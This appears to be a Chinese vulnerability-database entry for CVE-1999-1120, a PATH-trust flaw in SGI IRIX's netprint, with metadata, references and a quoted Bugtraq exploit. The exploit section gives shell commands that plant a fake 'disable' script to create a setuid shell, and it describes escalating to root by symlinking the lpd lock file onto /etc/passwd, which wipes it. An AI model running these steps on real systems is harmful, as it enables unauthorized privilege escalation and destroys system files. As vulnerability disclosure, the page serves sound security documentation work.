SGI IRIX权限许可漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105278 漏洞类型 未知
发布时间 1997-01-04 更新时间 2005-05-02
CVE编号 CVE-1999-1120 CNNVD-ID CNNVD-199701-042
漏洞平台 IRIX CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/19313
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199701-042
|漏洞详情
SGIIRIX6.4版本及之前版本查找并执行无效程序时信任PATH环境变量,本地用户可以获得特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/395/info


A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp.

% cat > /tmp/disable
cp /bin/sh /tmp/lpshell
chmod 4755 /tmp/lpshell
^D
% set path=(. $path)
% netprint -n blah -h blah -p blah 1-234
% /tmp/lpshell

However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat.
|参考资料

来源:XF
名称:sgi-netprint(2107)
链接:http://xforce.iss.net/static/2107.php
来源:BID
名称:395
链接:http://www.securityfocus.com/bid/395
来源:BUGTRAQ
名称:19970104Irix:netprintstory
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420403&w=2
来源:SGI
名称:19961203-02-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19961203-02-PX
来源:OSVDB
名称:993
链接:http://www.osvdb.org/993
来源:SGI
名称:19961203-01-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19961203-01-PX